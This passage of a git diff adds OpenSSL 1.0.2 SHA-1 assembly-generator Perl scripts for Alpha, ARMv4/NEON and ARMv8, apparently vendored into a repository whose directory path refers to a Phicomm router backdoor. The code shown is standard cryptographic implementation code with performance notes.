+	stq	s4,40(sp)
+	stq	s5,48(sp)
+	stq	fp,56(sp)
+	.mask	0x0400fe00,-64
+	.frame	sp,64,ra
+	.prologue 0
+
+	ldl	$A,0($ctx)
+	ldl	$B,4($ctx)
+	sll	$num,6,$num
+	ldl	$C,8($ctx)
+	ldl	$D,12($ctx)
+	ldl	$E,16($ctx)
+	addq	$inp,$num,$num
+
+.Lloop:
+	.set	noreorder
+	ldah	$K,23170(zero)
+	zapnot	$B,0xf,$B
+	lda	$K,31129($K)	# K_00_19
+___
+for ($i=0;$i<20;$i++) { &BODY_00_19($i,@V); unshift(@V,pop(@V)); }
+
+$code.=<<___;
+	ldah	$K,28378(zero)
+	lda	$K,-5215($K)	# K_20_39
+___
+for (;$i<40;$i++) { &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+
+$code.=<<___;
+	ldah	$K,-28900(zero)
+	lda	$K,-17188($K)	# K_40_59
+___
+for (;$i<60;$i++) { &BODY_40_59($i,@V); unshift(@V,pop(@V)); }
+
+$code.=<<___;
+	ldah	$K,-13725(zero)
+	lda	$K,-15914($K)	# K_60_79
+___
+for (;$i<80;$i++) { &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+
+$code.=<<___;
+	addl	@X[0],$A,$A
+	addl	@X[1],$B,$B
+	addl	@X[2],$C,$C
+	addl	@X[3],$D,$D
+	addl	@X[4],$E,$E
+	stl	$A,0($ctx)
+	stl	$B,4($ctx)
+	addq	$inp,64,$inp
+	stl	$C,8($ctx)
+	stl	$D,12($ctx)
+	stl	$E,16($ctx)
+	cmpult	$inp,$num,$t1
+	bne	$t1,.Lloop
+
+	.set	noreorder
+	ldq	ra,0(sp)
+	ldq	s0,8(sp)
+	ldq	s1,16(sp)
+	ldq	s2,24(sp)
+	ldq	s3,32(sp)
+	ldq	s4,40(sp)
+	ldq	s5,48(sp)
+	ldq	fp,56(sp)
+	lda	sp,64(sp)
+	ret	(ra)
+.end	sha1_block_data_order
+.ascii	"SHA1 block transform for Alpha, CRYPTOGAMS by <appro\@openssl.org>"
+.align	2
+___
+$output=shift and open STDOUT,">$output";
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-armv4-large.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-armv4-large.pl
new file mode 100644
index 0000000..b2c3032
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-armv4-large.pl
@@ -0,0 +1,683 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# sha1_block procedure for ARMv4.
+#
+# January 2007.
+
+# Size/performance trade-off
+# ====================================================================
+# impl		size in bytes	comp cycles[*]	measured performance
+# ====================================================================
+# thumb		304		3212		4420
+# armv4-small	392/+29%	1958/+64%	2250/+96%
+# armv4-compact	740/+89%	1552/+26%	1840/+22%
+# armv4-large	1420/+92%	1307/+19%	1370/+34%[***]
+# full unroll	~5100/+260%	~1260/+4%	~1300/+5%
+# ====================================================================
+# thumb		= same as 'small' but in Thumb instructions[**] and
+#		  with recurring code in two private functions;
+# small		= detached Xload/update, loops are folded;
+# compact	= detached Xload/update, 5x unroll;
+# large		= interleaved Xload/update, 5x unroll;
+# full unroll	= interleaved Xload/update, full unroll, estimated[!];
+#
+# [*]	Manually counted instructions in "grand" loop body. Measured
+#	performance is affected by prologue and epilogue overhead,
+#	i-cache availability, branch penalties, etc.
+# [**]	While each Thumb instruction is twice smaller, they are not as
+#	diverse as ARM ones: e.g., there are only two arithmetic
+#	instructions with 3 arguments, no [fixed] rotate, addressing
+#	modes are limited. As result it takes more instructions to do
+#	the same job in Thumb, therefore the code is never twice as
+#	small and always slower.
+# [***]	which is also ~35% better than compiler generated code. Dual-
+#	issue Cortex A8 core was measured to process input block in
+#	~990 cycles.
+
+# August 2010.
+#
+# Rescheduling for dual-issue pipeline resulted in 13% improvement on
+# Cortex A8 core and in absolute terms ~870 cycles per input block
+# [or 13.6 cycles per byte].
+
+# February 2011.
+#
+# Profiler-assisted and platform-specific optimization resulted in 10%
+# improvement on Cortex A8 core and 12.2 cycles per byte.
+
+# September 2013.
+#
+# Add NEON implementation (see sha1-586.pl for background info). On
+# Cortex A8 it was measured to process one byte in 6.7 cycles or >80%
+# faster than integer-only code. Because [fully unrolled] NEON code
+# is ~2.5x larger and there are some redundant instructions executed
+# when processing last block, improvement is not as big for smallest
+# blocks, only ~30%. Snapdragon S4 is a tad faster, 6.4 cycles per
+# byte, which is also >80% faster than integer-only code.
+
+# May 2014.
+#
+# Add ARMv8 code path performing at 2.35 cpb on Apple A7.
+
+while (($output=shift) && ($output!~/^\w[\w\-]*\.\w+$/)) {}
+open STDOUT,">$output";
+
+$ctx="r0";
+$inp="r1";
+$len="r2";
+$a="r3";
+$b="r4";
+$c="r5";
+$d="r6";
+$e="r7";
+$K="r8";
+$t0="r9";
+$t1="r10";
+$t2="r11";
+$t3="r12";
+$Xi="r14";
+@V=($a,$b,$c,$d,$e);
+
+sub Xupdate {
+my ($a,$b,$c,$d,$e,$opt1,$opt2)=@_;
+$code.=<<___;
+	ldr	$t0,[$Xi,#15*4]
+	ldr	$t1,[$Xi,#13*4]
+	ldr	$t2,[$Xi,#7*4]
+	add	$e,$K,$e,ror#2			@ E+=K_xx_xx
+	ldr	$t3,[$Xi,#2*4]
+	eor	$t0,$t0,$t1
+	eor	$t2,$t2,$t3			@ 1 cycle stall
+	eor	$t1,$c,$d			@ F_xx_xx
+	mov	$t0,$t0,ror#31
+	add	$e,$e,$a,ror#27			@ E+=ROR(A,27)
+	eor	$t0,$t0,$t2,ror#31
+	str	$t0,[$Xi,#-4]!
+	$opt1					@ F_xx_xx
+	$opt2					@ F_xx_xx
+	add	$e,$e,$t0			@ E+=X[i]
+___
+}
+
+sub BODY_00_15 {
+my ($a,$b,$c,$d,$e)=@_;
+$code.=<<___;
+#if __ARM_ARCH__<7
+	ldrb	$t1,[$inp,#2]
+	ldrb	$t0,[$inp,#3]
+	ldrb	$t2,[$inp,#1]
+	add	$e,$K,$e,ror#2			@ E+=K_00_19
+	ldrb	$t3,[$inp],#4
+	orr	$t0,$t0,$t1,lsl#8
+	eor	$t1,$c,$d			@ F_xx_xx
+	orr	$t0,$t0,$t2,lsl#16
+	add	$e,$e,$a,ror#27			@ E+=ROR(A,27)
+	orr	$t0,$t0,$t3,lsl#24
+#else
+	ldr	$t0,[$inp],#4			@ handles unaligned
+	add	$e,$K,$e,ror#2			@ E+=K_00_19
+	eor	$t1,$c,$d			@ F_xx_xx
+	add	$e,$e,$a,ror#27			@ E+=ROR(A,27)
+#ifdef __ARMEL__
+	rev	$t0,$t0				@ byte swap
+#endif
+#endif
+	and	$t1,$b,$t1,ror#2
+	add	$e,$e,$t0			@ E+=X[i]
+	eor	$t1,$t1,$d,ror#2		@ F_00_19(B,C,D)
+	str	$t0,[$Xi,#-4]!
+	add	$e,$e,$t1			@ E+=F_00_19(B,C,D)
+___
+}
+
+sub BODY_16_19 {
+my ($a,$b,$c,$d,$e)=@_;
+	&Xupdate(@_,"and $t1,$b,$t1,ror#2");
+$code.=<<___;
+	eor	$t1,$t1,$d,ror#2		@ F_00_19(B,C,D)
+	add	$e,$e,$t1			@ E+=F_00_19(B,C,D)
+___
+}
+
+sub BODY_20_39 {
+my ($a,$b,$c,$d,$e)=@_;
+	&Xupdate(@_,"eor $t1,$b,$t1,ror#2");
+$code.=<<___;
+	add	$e,$e,$t1			@ E+=F_20_39(B,C,D)
+___
+}
+
+sub BODY_40_59 {
+my ($a,$b,$c,$d,$e)=@_;
+	&Xupdate(@_,"and $t1,$b,$t1,ror#2","and $t2,$c,$d");
+$code.=<<___;
+	add	$e,$e,$t1			@ E+=F_40_59(B,C,D)
+	add	$e,$e,$t2,ror#2
+___
+}
+
+$code=<<___;
+#include "arm_arch.h"
+
+.text
+.code	32
+
+.global	sha1_block_data_order
+.type	sha1_block_data_order,%function
+
+.align	5
+sha1_block_data_order:
+#if __ARM_MAX_ARCH__>=7
+	sub	r3,pc,#8		@ sha1_block_data_order
+	ldr	r12,.LOPENSSL_armcap
+	ldr	r12,[r3,r12]		@ OPENSSL_armcap_P
+	tst	r12,#ARMV8_SHA1
+	bne	.LARMv8
+	tst	r12,#ARMV7_NEON
+	bne	.LNEON
+#endif
+	stmdb	sp!,{r4-r12,lr}
+	add	$len,$inp,$len,lsl#6	@ $len to point at the end of $inp
+	ldmia	$ctx,{$a,$b,$c,$d,$e}
+.Lloop:
+	ldr	$K,.LK_00_19
+	mov	$Xi,sp
+	sub	sp,sp,#15*4
+	mov	$c,$c,ror#30
+	mov	$d,$d,ror#30
+	mov	$e,$e,ror#30		@ [6]
+.L_00_15:
+___
+for($i=0;$i<5;$i++) {
+	&BODY_00_15(@V);	unshift(@V,pop(@V));
+}
+$code.=<<___;
+	teq	$Xi,sp
+	bne	.L_00_15		@ [((11+4)*5+2)*3]
+	sub	sp,sp,#25*4
+___
+	&BODY_00_15(@V);	unshift(@V,pop(@V));
+	&BODY_16_19(@V);	unshift(@V,pop(@V));
+	&BODY_16_19(@V);	unshift(@V,pop(@V));
+	&BODY_16_19(@V);	unshift(@V,pop(@V));
+	&BODY_16_19(@V);	unshift(@V,pop(@V));
+$code.=<<___;
+
+	ldr	$K,.LK_20_39		@ [+15+16*4]
+	cmn	sp,#0			@ [+3], clear carry to denote 20_39
+.L_20_39_or_60_79:
+___
+for($i=0;$i<5;$i++) {
+	&BODY_20_39(@V);	unshift(@V,pop(@V));
+}
+$code.=<<___;
+	teq	$Xi,sp			@ preserve carry
+	bne	.L_20_39_or_60_79	@ [+((12+3)*5+2)*4]
+	bcs	.L_done			@ [+((12+3)*5+2)*4], spare 300 bytes
+
+	ldr	$K,.LK_40_59
+	sub	sp,sp,#20*4		@ [+2]
+.L_40_59:
+___
+for($i=0;$i<5;$i++) {
+	&BODY_40_59(@V);	unshift(@V,pop(@V));
+}
+$code.=<<___;
+	teq	$Xi,sp
+	bne	.L_40_59		@ [+((12+5)*5+2)*4]
+
+	ldr	$K,.LK_60_79
+	sub	sp,sp,#20*4
+	cmp	sp,#0			@ set carry to denote 60_79
+	b	.L_20_39_or_60_79	@ [+4], spare 300 bytes
+.L_done:
+	add	sp,sp,#80*4		@ "deallocate" stack frame
+	ldmia	$ctx,{$K,$t0,$t1,$t2,$t3}
+	add	$a,$K,$a
+	add	$b,$t0,$b
+	add	$c,$t1,$c,ror#2
+	add	$d,$t2,$d,ror#2
+	add	$e,$t3,$e,ror#2
+	stmia	$ctx,{$a,$b,$c,$d,$e}
+	teq	$inp,$len
+	bne	.Lloop			@ [+18], total 1307
+
+#if __ARM_ARCH__>=5
+	ldmia	sp!,{r4-r12,pc}
+#else
+	ldmia	sp!,{r4-r12,lr}
+	tst	lr,#1
+	moveq	pc,lr			@ be binary compatible with V4, yet
+	bx	lr			@ interoperable with Thumb ISA:-)
+#endif
+.size	sha1_block_data_order,.-sha1_block_data_order
+
+.align	5
+.LK_00_19:	.word	0x5a827999
+.LK_20_39:	.word	0x6ed9eba1
+.LK_40_59:	.word	0x8f1bbcdc
+.LK_60_79:	.word	0xca62c1d6
+#if __ARM_MAX_ARCH__>=7
+.LOPENSSL_armcap:
+.word	OPENSSL_armcap_P-sha1_block_data_order
+#endif
+.asciz	"SHA1 block transform for ARMv4/NEON/ARMv8, CRYPTOGAMS by <appro\@openssl.org>"
+.align	5
+___
+#####################################################################
+# NEON stuff
+#
+{{{
+my @V=($a,$b,$c,$d,$e);
+my ($K_XX_XX,$Ki,$t0,$t1,$Xfer,$saved_sp)=map("r$_",(8..12,14));
+my $Xi=4;
+my @X=map("q$_",(8..11,0..3));
+my @Tx=("q12","q13");
+my ($K,$zero)=("q14","q15");
+my $j=0;
+
+sub AUTOLOAD()          # thunk [simplified] x86-style perlasm
+{ my $opcode = $AUTOLOAD; $opcode =~ s/.*:://; $opcode =~ s/_/\./;
+  my $arg = pop;
+    $arg = "#$arg" if ($arg*1 eq $arg);
+    $code .= "\t$opcode\t".join(',',@_,$arg)."\n";
+}
+
+sub body_00_19 () {
+	(
+	'($a,$b,$c,$d,$e)=@V;'.		# '$code.="@ $j\n";'.
+	'&bic	($t0,$d,$b)',
+	'&add	($e,$e,$Ki)',		# e+=X[i]+K
+	'&and	($t1,$c,$b)',
+	'&ldr	($Ki,sprintf "[sp,#%d]",4*(($j+1)&15))',
+	'&add	($e,$e,$a,"ror#27")',	# e+=ROR(A,27)
+	'&eor	($t1,$t1,$t0)',		# F_00_19
+	'&mov	($b,$b,"ror#2")',	# b=ROR(b,2)
+	'&add	($e,$e,$t1);'.		# e+=F_00_19
+	'$j++;	unshift(@V,pop(@V));'
+	)
+}
+sub body_20_39 () {
+	(
+	'($a,$b,$c,$d,$e)=@V;'.		# '$code.="@ $j\n";'.
+	'&eor	($t0,$b,$d)',
+	'&add	($e,$e,$Ki)',		# e+=X[i]+K
+	'&ldr	($Ki,sprintf "[sp,#%d]",4*(($j+1)&15)) if ($j<79)',
+	'&eor	($t1,$t0,$c)',		# F_20_39
+	'&add	($e,$e,$a,"ror#27")',	# e+=ROR(A,27)
+	'&mov	($b,$b,"ror#2")',	# b=ROR(b,2)
+	'&add	($e,$e,$t1);'.		# e+=F_20_39
+	'$j++;	unshift(@V,pop(@V));'
+	)
+}
+sub body_40_59 () {
+	(
+	'($a,$b,$c,$d,$e)=@V;'.		# '$code.="@ $j\n";'.
+	'&add	($e,$e,$Ki)',		# e+=X[i]+K
+	'&and	($t0,$c,$d)',
+	'&ldr	($Ki,sprintf "[sp,#%d]",4*(($j+1)&15))',
+	'&add	($e,$e,$a,"ror#27")',	# e+=ROR(A,27)
+	'&eor	($t1,$c,$d)',
+	'&add	($e,$e,$t0)',
+	'&and	($t1,$t1,$b)',
+	'&mov	($b,$b,"ror#2")',	# b=ROR(b,2)
+	'&add	($e,$e,$t1);'.		# e+=F_40_59
+	'$j++;	unshift(@V,pop(@V));'
+	)
+}
+
+sub Xupdate_16_31 ()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);
+  my ($a,$b,$c,$d,$e);
+
+	&vext_8		(@X[0],@X[-4&7],@X[-3&7],8);	# compose "X[-14]" in "X[0]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &vadd_i32	(@Tx[1],@X[-1&7],$K);
+	 eval(shift(@insns));
+	  &vld1_32	("{$K\[]}","[$K_XX_XX,:32]!")	if ($Xi%5==0);
+	 eval(shift(@insns));
+	&vext_8		(@Tx[0],@X[-1&7],$zero,4);	# "X[-3]", 3 words
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&veor		(@X[0],@X[0],@X[-4&7]);		# "X[0]"^="X[-16]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&veor		(@Tx[0],@Tx[0],@X[-2&7]);	# "X[-3]"^"X[-8]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&veor		(@Tx[0],@Tx[0],@X[0]);		# "X[0]"^="X[-3]"^"X[-8]
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &vst1_32	("{@Tx[1]}","[$Xfer,:128]!");	# X[]+K xfer
+	  &sub		($Xfer,$Xfer,64)		if ($Xi%4==0);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vext_8		(@Tx[1],$zero,@Tx[0],4);	# "X[0]"<<96, extract one dword
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vadd_i32	(@X[0],@Tx[0],@Tx[0]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vsri_32	(@X[0],@Tx[0],31);		# "X[0]"<<<=1
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vshr_u32	(@Tx[0],@Tx[1],30);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vshl_u32	(@Tx[1],@Tx[1],2);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&veor		(@X[0],@X[0],@Tx[0]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&veor		(@X[0],@X[0],@Tx[1]);		# "X[0]"^=("X[0]">>96)<<<2
+
+	foreach (@insns) { eval; }	# remaining instructions [if any]
+
+  $Xi++;	push(@X,shift(@X));	# "rotate" X[]
+}
+
+sub Xupdate_32_79 ()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);
+  my ($a,$b,$c,$d,$e);
+
+	&vext_8		(@Tx[0],@X[-2&7],@X[-1&7],8);	# compose "X[-6]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&veor		(@X[0],@X[0],@X[-4&7]);		# "X[0]"="X[-32]"^"X[-16]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&veor		(@X[0],@X[0],@X[-7&7]);		# "X[0]"^="X[-28]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &vadd_i32	(@Tx[1],@X[-1&7],$K);
+	 eval(shift(@insns));
+	  &vld1_32	("{$K\[]}","[$K_XX_XX,:32]!")	if ($Xi%5==0);
+	 eval(shift(@insns));
+	&veor		(@Tx[0],@Tx[0],@X[0]);		# "X[-6]"^="X[0]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vshr_u32	(@X[0],@Tx[0],30);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &vst1_32	("{@Tx[1]}","[$Xfer,:128]!");	# X[]+K xfer
+	  &sub		($Xfer,$Xfer,64)		if ($Xi%4==0);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vsli_32	(@X[0],@Tx[0],2);		# "X[0]"="X[-6]"<<<2
+
+	foreach (@insns) { eval; }	# remaining instructions [if any]
+
+  $Xi++;	push(@X,shift(@X));	# "rotate" X[]
+}
+
+sub Xuplast_80 ()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);
+  my ($a,$b,$c,$d,$e);
+
+	&vadd_i32	(@Tx[1],@X[-1&7],$K);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vst1_32	("{@Tx[1]}","[$Xfer,:128]!");
+	&sub		($Xfer,$Xfer,64);
+
+	&teq		($inp,$len);
+	&sub		($K_XX_XX,$K_XX_XX,16);	# rewind $K_XX_XX
+	&subeq		($inp,$inp,64);		# reload last block to avoid SEGV
+	&vld1_8		("{@X[-4&7]-@X[-3&7]}","[$inp]!");
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vld1_8		("{@X[-2&7]-@X[-1&7]}","[$inp]!");
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vld1_32	("{$K\[]}","[$K_XX_XX,:32]!");	# load K_00_19
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vrev32_8	(@X[-4&7],@X[-4&7]);
+
+	foreach (@insns) { eval; }		# remaining instructions
+
+   $Xi=0;
+}
+
+sub Xloop()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);
+  my ($a,$b,$c,$d,$e);
+
+	&vrev32_8	(@X[($Xi-3)&7],@X[($Xi-3)&7]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vadd_i32	(@X[$Xi&7],@X[($Xi-4)&7],$K);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vst1_32	("{@X[$Xi&7]}","[$Xfer,:128]!");# X[]+K xfer to IALU
+
+	foreach (@insns) { eval; }
+
+  $Xi++;
+}
+
+$code.=<<___;
+#if __ARM_MAX_ARCH__>=7
+.arch	armv7-a
+.fpu	neon
+
+.type	sha1_block_data_order_neon,%function
+.align	4
+sha1_block_data_order_neon:
+.LNEON:
+	stmdb	sp!,{r4-r12,lr}
+	add	$len,$inp,$len,lsl#6	@ $len to point at the end of $inp
+	@ dmb				@ errata #451034 on early Cortex A8
+	@ vstmdb	sp!,{d8-d15}	@ ABI specification says so
+	mov	$saved_sp,sp
+	sub	sp,sp,#64		@ alloca
+	adr	$K_XX_XX,.LK_00_19
+	bic	sp,sp,#15		@ align for 128-bit stores
+
+	ldmia	$ctx,{$a,$b,$c,$d,$e}	@ load context
+	mov	$Xfer,sp
+
+	vld1.8		{@X[-4&7]-@X[-3&7]},[$inp]!	@ handles unaligned
+	veor		$zero,$zero,$zero
+	vld1.8		{@X[-2&7]-@X[-1&7]},[$inp]!
+	vld1.32		{${K}\[]},[$K_XX_XX,:32]!	@ load K_00_19
+	vrev32.8	@X[-4&7],@X[-4&7]		@ yes, even on
+	vrev32.8	@X[-3&7],@X[-3&7]		@ big-endian...
+	vrev32.8	@X[-2&7],@X[-2&7]
+	vadd.i32	@X[0],@X[-4&7],$K
+	vrev32.8	@X[-1&7],@X[-1&7]
+	vadd.i32	@X[1],@X[-3&7],$K
+	vst1.32		{@X[0]},[$Xfer,:128]!
+	vadd.i32	@X[2],@X[-2&7],$K
+	vst1.32		{@X[1]},[$Xfer,:128]!
+	vst1.32		{@X[2]},[$Xfer,:128]!
+	ldr		$Ki,[sp]			@ big RAW stall
+
+.Loop_neon:
+___
+	&Xupdate_16_31(\&body_00_19);
+	&Xupdate_16_31(\&body_00_19);
+	&Xupdate_16_31(\&body_00_19);
+	&Xupdate_16_31(\&body_00_19);
+	&Xupdate_32_79(\&body_00_19);
+	&Xupdate_32_79(\&body_20_39);
+	&Xupdate_32_79(\&body_20_39);
+	&Xupdate_32_79(\&body_20_39);
+	&Xupdate_32_79(\&body_20_39);
+	&Xupdate_32_79(\&body_20_39);
+	&Xupdate_32_79(\&body_40_59);
+	&Xupdate_32_79(\&body_40_59);
+	&Xupdate_32_79(\&body_40_59);
+	&Xupdate_32_79(\&body_40_59);
+	&Xupdate_32_79(\&body_40_59);
+	&Xupdate_32_79(\&body_20_39);
+	&Xuplast_80(\&body_20_39);
+	&Xloop(\&body_20_39);
+	&Xloop(\&body_20_39);
+	&Xloop(\&body_20_39);
+$code.=<<___;
+	ldmia	$ctx,{$Ki,$t0,$t1,$Xfer}	@ accumulate context
+	add	$a,$a,$Ki
+	ldr	$Ki,[$ctx,#16]
+	add	$b,$b,$t0
+	add	$c,$c,$t1
+	add	$d,$d,$Xfer
+	moveq	sp,$saved_sp
+	add	$e,$e,$Ki
+	ldrne	$Ki,[sp]
+	stmia	$ctx,{$a,$b,$c,$d,$e}
+	addne	$Xfer,sp,#3*16
+	bne	.Loop_neon
+
+	@ vldmia	sp!,{d8-d15}
+	ldmia	sp!,{r4-r12,pc}
+.size	sha1_block_data_order_neon,.-sha1_block_data_order_neon
+#endif
+___
+}}}
+#####################################################################
+# ARMv8 stuff
+#
+{{{
+my ($ABCD,$E,$E0,$E1)=map("q$_",(0..3));
+my @MSG=map("q$_",(4..7));
+my @Kxx=map("q$_",(8..11));
+my ($W0,$W1,$ABCD_SAVE)=map("q$_",(12..14));
+
+$code.=<<___;
+#if __ARM_MAX_ARCH__>=7
+.type	sha1_block_data_order_armv8,%function
+.align	5
+sha1_block_data_order_armv8:
+.LARMv8:
+	vstmdb	sp!,{d8-d15}		@ ABI specification says so
+
+	veor	$E,$E,$E
+	adr	r3,.LK_00_19
+	vld1.32	{$ABCD},[$ctx]!
+	vld1.32	{$E\[0]},[$ctx]
+	sub	$ctx,$ctx,#16
+	vld1.32	{@Kxx[0]\[]},[r3,:32]!
+	vld1.32	{@Kxx[1]\[]},[r3,:32]!
+	vld1.32	{@Kxx[2]\[]},[r3,:32]!
+	vld1.32	{@Kxx[3]\[]},[r3,:32]
+
+.Loop_v8:
+	vld1.8		{@MSG[0]-@MSG[1]},[$inp]!
+	vld1.8		{@MSG[2]-@MSG[3]},[$inp]!
+	vrev32.8	@MSG[0],@MSG[0]
+	vrev32.8	@MSG[1],@MSG[1]
+
+	vadd.i32	$W0,@Kxx[0],@MSG[0]
+	vrev32.8	@MSG[2],@MSG[2]
+	vmov		$ABCD_SAVE,$ABCD	@ offload
+	subs		$len,$len,#1
+
+	vadd.i32	$W1,@Kxx[0],@MSG[1]
+	vrev32.8	@MSG[3],@MSG[3]
+	sha1h		$E1,$ABCD		@ 0
+	sha1c		$ABCD,$E,$W0
+	vadd.i32	$W0,@Kxx[$j],@MSG[2]
+	sha1su0		@MSG[0],@MSG[1],@MSG[2]
+___
+for ($j=0,$i=1;$i<20-3;$i++) {
+my $f=("c","p","m","p")[$i/5];
+$code.=<<___;
+	sha1h		$E0,$ABCD		@ $i
+	sha1$f		$ABCD,$E1,$W1
+	vadd.i32	$W1,@Kxx[$j],@MSG[3]
+	sha1su1		@MSG[0],@MSG[3]
+___
+$code.=<<___ if ($i<20-4);
+	sha1su0		@MSG[1],@MSG[2],@MSG[3]
+___
+	($E0,$E1)=($E1,$E0);	($W0,$W1)=($W1,$W0);
+	push(@MSG,shift(@MSG));	$j++ if ((($i+3)%5)==0);
+}
+$code.=<<___;
+	sha1h		$E0,$ABCD		@ $i
+	sha1p		$ABCD,$E1,$W1
+	vadd.i32	$W1,@Kxx[$j],@MSG[3]
+
+	sha1h		$E1,$ABCD		@ 18
+	sha1p		$ABCD,$E0,$W0
+
+	sha1h		$E0,$ABCD		@ 19
+	sha1p		$ABCD,$E1,$W1
+
+	vadd.i32	$E,$E,$E0
+	vadd.i32	$ABCD,$ABCD,$ABCD_SAVE
+	bne		.Loop_v8
+
+	vst1.32		{$ABCD},[$ctx]!
+	vst1.32		{$E\[0]},[$ctx]
+
+	vldmia	sp!,{d8-d15}
+	ret					@ bx lr
+.size	sha1_block_data_order_armv8,.-sha1_block_data_order_armv8
+#endif
+___
+}}}
+$code.=<<___;
+#if __ARM_MAX_ARCH__>=7
+.comm	OPENSSL_armcap_P,4,4
+#endif
+___
+
+{   my  %opcode = (
+	"sha1c"		=> 0xf2000c40,	"sha1p"		=> 0xf2100c40,
+	"sha1m"		=> 0xf2200c40,	"sha1su0"	=> 0xf2300c40,
+	"sha1h"		=> 0xf3b902c0,	"sha1su1"	=> 0xf3ba0380	);
+
+    sub unsha1 {
+	my ($mnemonic,$arg)=@_;
+
+	if ($arg =~ m/q([0-9]+)(?:,\s*q([0-9]+))?,\s*q([0-9]+)/o) {
+	    my $word = $opcode{$mnemonic}|(($1&7)<<13)|(($1&8)<<19)
+					 |(($2&7)<<17)|(($2&8)<<4)
+					 |(($3&7)<<1) |(($3&8)<<2);
+	    # since ARMv7 instructions are always encoded little-endian.
+	    # correct solution is to use .inst directive, but older
+	    # assemblers don't implement it:-(
+	    sprintf ".byte\t0x%02x,0x%02x,0x%02x,0x%02x\t@ %s %s",
+			$word&0xff,($word>>8)&0xff,
+			($word>>16)&0xff,($word>>24)&0xff,
+			$mnemonic,$arg;
+	}
+    }
+}
+
+foreach (split($/,$code)) {
+	s/{q([0-9]+)\[\]}/sprintf "{d%d[],d%d[]}",2*$1,2*$1+1/eo	or
+	s/{q([0-9]+)\[0\]}/sprintf "{d%d[0]}",2*$1/eo;
+
+	s/\b(sha1\w+)\s+(q.*)/unsha1($1,$2)/geo;
+
+	s/\bret\b/bx	lr/o		or
+	s/\bbx\s+lr\b/.word\t0xe12fff1e/o;	# make it possible to compile with -march=armv4
+
+	print $_,$/;
+}
+
+close STDOUT; # enforce flush
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-armv8.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-armv8.pl
new file mode 100644
index 0000000..deb1238
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-armv8.pl
@@ -0,0 +1,334 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# SHA1 for ARMv8.
+#
+# Performance in cycles per processed byte and improvement coefficient
+# over code generated with "default" compiler:
+#
+#		hardware-assisted	software(*)
+# Apple A7	2.31			4.13 (+14%)
+# Cortex-A53	2.19			8.73 (+108%)
+# Cortex-A57	2.35			7.88 (+74%)
+#
+# (*)	Software results are presented mostly for reference purposes.
+
+$flavour = shift;
+open STDOUT,">".shift;
+
+($ctx,$inp,$num)=("x0","x1","x2");
+@Xw=map("w$_",(3..17,19));
+@Xx=map("x$_",(3..17,19));
+@V=($A,$B,$C,$D,$E)=map("w$_",(20..24));
+($t0,$t1,$t2,$K)=map("w$_",(25..28));
+
+
+sub BODY_00_19 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=($i+2)&15;
+
+$code.=<<___ if ($i<15 && !($i&1));
+	lsr	@Xx[$i+1],@Xx[$i],#32
+___
+$code.=<<___ if ($i<14 && !($i&1));
+	ldr	@Xx[$i+2],[$inp,#`($i+2)*4-64`]
+___
+$code.=<<___ if ($i<14 && ($i&1));
+#ifdef	__ARMEB__
+	ror	@Xx[$i+1],@Xx[$i+1],#32
+#else
+	rev32	@Xx[$i+1],@Xx[$i+1]
+#endif
+___
+$code.=<<___ if ($i<14);
+	bic	$t0,$d,$b
+	and	$t1,$c,$b
+	ror	$t2,$a,#27
+	add	$d,$d,$K		// future e+=K
+	orr	$t0,$t0,$t1
+	add	$e,$e,$t2		// e+=rot(a,5)
